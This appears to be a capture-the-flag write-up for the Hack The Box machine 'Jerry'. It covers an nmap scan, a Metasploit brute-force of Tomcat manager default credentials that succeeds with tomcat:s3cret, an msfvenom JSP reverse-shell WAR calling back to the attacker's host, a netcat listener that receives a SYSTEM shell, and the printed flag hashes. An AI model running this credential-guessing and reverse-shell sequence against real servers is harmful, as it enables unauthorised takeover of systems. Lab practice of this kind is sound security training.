Jerry
Starting with a port scan.
root@n0w4n:~# nmap -n -sS -sV -p- 10.10.10.95 Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-04 21:16 CEST Nmap scan report for 10.10.10.95 Host is up (0.026s latency). Not shown: 65534 filtered ports PORT STATE SERVICE VERSION 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 113.43 seconds
That’s not much. Looks like a Apache Tomcat server is running. When looking at the main page there is a version number.
root@n0w4n:~# nmap -O 10.10.10.95 Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-04 21:26 CEST Nmap scan report for 10.10.10.95 Host is up (0.025s latency). Not shown: 999 filtered ports PORT STATE SERVICE 8080/tcp open http-proxy Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 (90%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%) No exact OS matches for host (test conditions non-ideal). OS detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.66 seconds
I forgot the -O flag. From the htb page I knew it was a windows machine, but nmap thinks it is running on a Windows server 2012 (R2).
Its version is “Version 7.0.88, May 7 2018”.
msf > use auxiliary/scanner/http/tomcat_mgr_login msf auxiliary(scanner/http/tomcat_mgr_login) > options Module options (auxiliary/scanner/http/tomcat_mgr_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no The HTTP password to specify for authentication PASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target address range or CIDR identifier RPORT 8080 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host TARGETURI /manager/html yes URI for Manager login. Default is /manager/html THREADS 1 yes The number of concurrent threads USERNAME no The HTTP username to specify for authentication USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line VERBOSE true yes Whether to print output for all attempts VHOST no HTTP server virtual host msf auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 10.10.10.95 rhosts => 10.10.10.95 msf auxiliary(scanner/http/tomcat_mgr_login) > run [-] 10.10.10.95:8080 - LOGIN FAILED: admin:admin (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: admin:manager (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: admin:role1 (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: admin:root (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: admin:tomcat (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: admin:s3cret (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: admin:vagrant (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: manager:admin (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: manager:manager (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: manager:role1 (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: manager:root (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: manager:tomcat (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: manager:s3cret (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: manager:vagrant (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: role1:admin (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: role1:manager (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: role1:role1 (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: role1:root (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: role1:tomcat (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: role1:s3cret (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: role1:vagrant (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: root:admin (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: root:manager (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: root:role1 (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: root:root (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: root:tomcat (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: root:s3cret (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: root:vagrant (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:admin (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:manager (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:role1 (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:root (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:tomcat (Incorrect) [+] 10.10.10.95:8080 - Login Successful: tomcat:s3cret [-] 10.10.10.95:8080 - LOGIN FAILED: both:admin (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: both:manager (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: both:role1 (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: both:root (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: both:tomcat (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: both:s3cret (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: both:vagrant (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: j2deployer:j2deployer (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: cxsdk:kdsxc (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: root:owaspbwa (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: ADMIN:ADMIN (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: xampp:xampp (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: QCC:QLogic66 (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: admin:vagrant (Incorrect) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Looks like the enumeration tool found some credentials.
On this page there is an option to upload a war file.
root@n0w4n:~/opt/htb/jerry# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.7 LPORT=31337 -f war > shell.war Payload size: 1103 bytes Final size of war file: 1103 bytes
root@n0w4n:~/opt/htb/jerry# nc -lvnp 31337 listening on [any] 31337 ... connect to [10.10.14.7] from (UNKNOWN) [10.10.10.95] 49194 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\apache-tomcat-7.0.88>whoami whoami nt authority\system C:\apache-tomcat-7.0.88>
wow…..that was quick.
Now for the flags.
c:\Users\Administrator\Desktop\flags>dir
dir
Volume in drive C has no label.
Volume Serial Number is FC2B-E489
Directory of c:\Users\Administrator\Desktop\flags
06/19/2018 07:09 AM <DIR> .
06/19/2018 07:09 AM <DIR> ..
06/19/2018 07:11 AM 88 2 for the price of 1.txt
1 File(s) 88 bytes
2 Dir(s) 27,616,829,440 bytes free
c:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00
root.txt
04a8b36e1545a455393d067e772fe90e
And done.